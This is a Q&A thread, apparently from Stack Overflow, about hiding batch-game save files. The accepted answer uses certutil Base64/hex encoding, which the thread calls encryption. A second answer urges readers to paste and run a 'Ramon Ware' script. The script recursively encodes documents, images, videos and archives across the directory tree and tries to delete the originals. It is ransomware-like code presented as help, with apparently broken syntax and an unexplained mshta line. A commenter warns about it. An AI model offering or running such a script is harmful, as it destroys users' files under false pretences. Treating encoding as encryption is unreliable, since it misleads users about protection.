# Encrypt files made through batch file

Tags: batch-file

Basically what I mean is that let's say I want to make a batch file game, and I need the batch to generate save games such as the output name is like this: "save1.save" and I want to somehow "encrypt" it, like it isn't editable and will show rubbish characters when a user wants to edit the save file. So the next time the batch file loads a save file, it will be able to decrypt it, modify contents, then encrypt it again. I know I can change the output file extension, but it probably won't work as users can still view it with Windows' Notepad program.

Answer (score 2, accepted):

`CERTUTIL` is the easiest way - with it you can encode your file to BASE64 or HEX (or both):

```
certutil -encodehex save1.save save1.hex
certutil -decodehex save1.hex save1.save
```

or

```
certutil -encode save1.save save1.b64
certutil -decode save1.b64 save1.save
```

[CERTUTIL](http://ss64.com/nt/certutil.html)

Comment: I just tried to execute this on a 4GB file, hoping to encrypt the content. And it resulted in a 90 MB file. Something obviously went wrong, is it just a size limitation ?

Comment: IMHO certutil is broken. In my case it works for small files but I have tried it with 90MB files and the result is: CertUtil: -encodehex command FAILED: 0x80070216 (WIN32: 534)
CertUtil: Arithmetic result exceeded 32 bits.

Answer (score 0):

You can use this code below. Just copy and paste it to your notepad and save it as .bat then run it.

```
@Echo off
mode con:cols=50 lines=2
set pass=SegoCode

Title Ramon Ware

echo Scanning. . . .

for /r %%F in (*.txt, *.doc, *.xlsx, *.jpg, *.mp4, *.mp3, *.mov, *.7z, *.rar, *.zip) do (certutil -encode "%%F" "%%F.enc" del "%%F")

cls
setlocal
for /F "delims=" %%a in ('mshta.exe "%~F0"') do set "HTA=%%a"
```

Comment: Beware that this will encrypt not one file but all *.txt *.doc etc. listed above in the directory where the file is run.